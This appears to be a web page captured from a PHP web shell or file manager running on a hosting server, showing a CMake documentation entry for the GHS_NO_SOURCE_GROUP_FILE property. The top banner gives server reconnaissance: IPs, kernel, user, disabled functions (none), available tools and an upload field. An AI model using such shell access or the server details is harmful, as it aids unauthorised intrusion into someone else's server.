| Server IP : 217.160.0.244 / Your IP : 216.73.217.138 Web Server : Apache System : Linux infong-eu155 4.4.400-icpu-108 #2 SMP Wed Feb 11 11:51:01 UTC 2026 x86_64 User : u100174116 ( 6746176) PHP Version : 8.5.10 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /usr/share/cmake-3.31/Help/prop_tgt/ |
Upload File : |
GHS_NO_SOURCE_GROUP_FILE ------------------------ .. versionadded:: 3.14 ``ON`` / ``OFF`` boolean to control if the project file for a target should be one single file or multiple files. The default behavior or when the property is ``OFF`` is to generate a project file for the target and then a sub-project file for each source group. When this property is ``ON`` or if :variable:`CMAKE_GHS_NO_SOURCE_GROUP_FILE` is ``ON`` then only a single project file is generated for the target. Supported on :generator:`Green Hills MULTI`.